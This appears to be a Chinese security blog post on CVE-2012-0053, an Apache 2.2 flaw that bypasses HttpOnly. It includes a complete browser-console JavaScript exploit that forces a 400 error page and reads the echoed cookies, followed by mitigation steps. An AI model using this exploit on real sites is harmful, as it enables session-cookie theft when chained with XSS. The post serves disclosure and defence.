很多程序以及一些商业或者成熟开源的 CMS 文章系统，为了防止 XSS 盗取用户 Cookie，一般都会给 Cookie 加上 HttpOnly 属性，禁止 JS 直接通过 `document.cookie` 读取，从而降低 XSS 的危害。而 Apache httpd 2.2.x（2.2.21 及之前版本）的一个信息泄露漏洞（CVE-2012-0053，对应 exploit-db 18442）刚好可以用来绕过 HttpOnly：当请求头超过 LimitRequestFieldSize 的限制时，Apache 默认的 400 错误页会把出错的请求头（包括完整的 Cookie 头）原样回显在 `<pre>` 标签中，页面内的脚本只要读取这个响应就能拿到 HttpOnly 的 Cookie。需要强调的是，这只是一个 HttpOnly 绕过，而不是独立的攻击：攻击者仍然要先在目标站点的同源上下文中执行脚本（例如利用一个已有的 XSS）。
用 Chrome 打开目标站点（该站点需运行在受影响的 Apache 版本上），按 F12 打开开发者工具，在 Console 中输入如下代码并回车：
// http://www.exploit-db.com/exploits/18442/
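// Plants (or, when good is true, expires) the oversized padding cookies.
// With the defaults, 10 cookies x 819 bytes = 8190 bytes of values alone,
// which together with the names and separators pushes the Cookie header past
// Apache's default LimitRequestFieldSize (8190 bytes) and forces a 400 reply.
// good  - truthy to expire the padding cookies, falsy to set them
// count - number of padding cookies to write (default 10)
// size  - length of each padding value in bytes (default 819)
// Side effect only: writes document.cookie count times; no return value.
function setCookies(good, count, size) {
  if (count === undefined) {
    count = 10;
  }
  if (size === undefined) {
    size = 819;
  }
  // new Array(n + 1).join(c) yields n copies of c (ES5-safe "repeat").
  var padding = new Array(size + 1).join("x");
  // A date in the past makes the browser discard the cookie immediately.
  var expired = new Date(+new Date() - 1).toUTCString();
  for (var i = 0; i < count; i++) {
    var cookie;
    if (good) {
      cookie = "xss" + i + "=;expires=" + expired + "; path=/;";
    } else {
      cookie = "xss" + i + "=" + padding + ";path=/";
    }
    document.cookie = cookie;
  }
}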
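// Parses the Cookie header that an unpatched Apache echoes back inside the
// <pre>...</pre> of its default 400 page and returns it as a name -> value map.
// The padding cookies (xss0, xss1, ...) planted by setCookies are dropped.
// responseText - raw body of the 400 response
// Returns {} when the body holds no <pre> block instead of throwing on null.
function parseEchoedCookies(responseText) {
  var cookieDict = {};
  // Flatten line breaks so a single regex can span the whole <pre> block.
  var flat = responseText.replace(/\r|\n/g, '');
  var found = flat.match(/<pre>(.+)<\/pre>/);
  if (found === null) {
    return cookieDict;
  }
  // Strip the "Cookie: " prefix and the padding that triggered the 400.
  var header = found[1].replace("Cookie: ", "");
  var pairs = header.replace(/xss\d+=x+;?/g, '').split(/;/g);
  for (var i = 0; i < pairs.length; i++) {
    // Trim: the "; " separator leaves a leading space on every name.
    var pair = pairs[i].trim();
    if (pair === '') {
      continue;
    }
    // Split on the first '=' only so values containing '=' (e.g. base64) survive intact.
    var eq = pair.indexOf('=');
    if (eq === -1) {
      cookieDict[pair] = '';
    } else {
      cookieDict[pair.slice(0, eq)] = pair.slice(eq + 1);
    }
  }
  return cookieDict;
}

// Requests "/" with the padding cookies in place and, on the resulting 400,
// shows every cookie (HttpOnly ones included) that Apache echoed back.
// Relies on setCookies() from this file; XMLHttpRequest, alert and document
// come from the browser. No return value.
function makeRequest() {
  // Plant the padding so the Cookie header exceeds Apache's header limit.
  setCookies();
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function () {
    // Only a completed 400 response carries the echoed header.
    if (xhr.readyState !== 4 || xhr.status !== 400) {
      return;
    }
    var cookieDict = parseEchoedCookies(xhr.responseText);
    // Expire the padding again so the site keeps working for the user.
    setCookies(true);
    alert(JSON.stringify(cookieDict));
  };
  xhr.open("GET", "/", true);
  xhr.send(null);
}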
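// Fire the probe as soon as the snippet is pasted into the console.
makeRequest();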
你就能看见华丽丽的 400 错误页里包含着完整的 Cookie 信息（包括带 HttpOnly 属性的 Cookie）。如果响应中没有被 `<pre>` 包裹的 Cookie 头，说明该 Apache 不受影响（已升级，或已配置了自定义的 400 错误页）。

下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#

修复方案：
Apache 官方提供 4 种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下：

In the event of a problem or error, Apache can be configured to do one of four things:
1. output a simple hardcoded error message —— 输出一个简单的硬编码错误信息（默认行为；正是这个默认页面把出错的请求头回显了出来）
2. output a customized message —— 输出一段自定义信息
3. redirect to a local URL-path to handle the problem/error —— 转向一个本地的自定义页面
4. redirect to an external URL to handle the problem/error —— 转向一个外部 URL
经测试，对于这类 400 错误只有方法 2 有效，返回包不会再包含 Cookie 内容。原因很可能是超长请求头在请求解析阶段就被拒绝，Apache 无法再对这个请求执行内部或外部重定向，所以方法 3、4 不会生效。
Apache 配置（注意指令名和状态码之间要有空格）：

ErrorDocument 400 "security test"

Apache 2.2 中自定义消息需用成对的双引号括起；2.0 的语法只要求开头的一个双引号，结尾的引号会被当作消息的一部分显示。
当然，升级 Apache 到已修复的版本（2.2.22 及以后）也可以，而且这才是根本修复；自定义 ErrorDocument 只是缓解措施。另外 HttpOnly 本身只是纵深防御的一层，根治站点自身的 XSS 才是关键 :)

参考：http://httpd.apache.org/security/vulnerabilities_22.html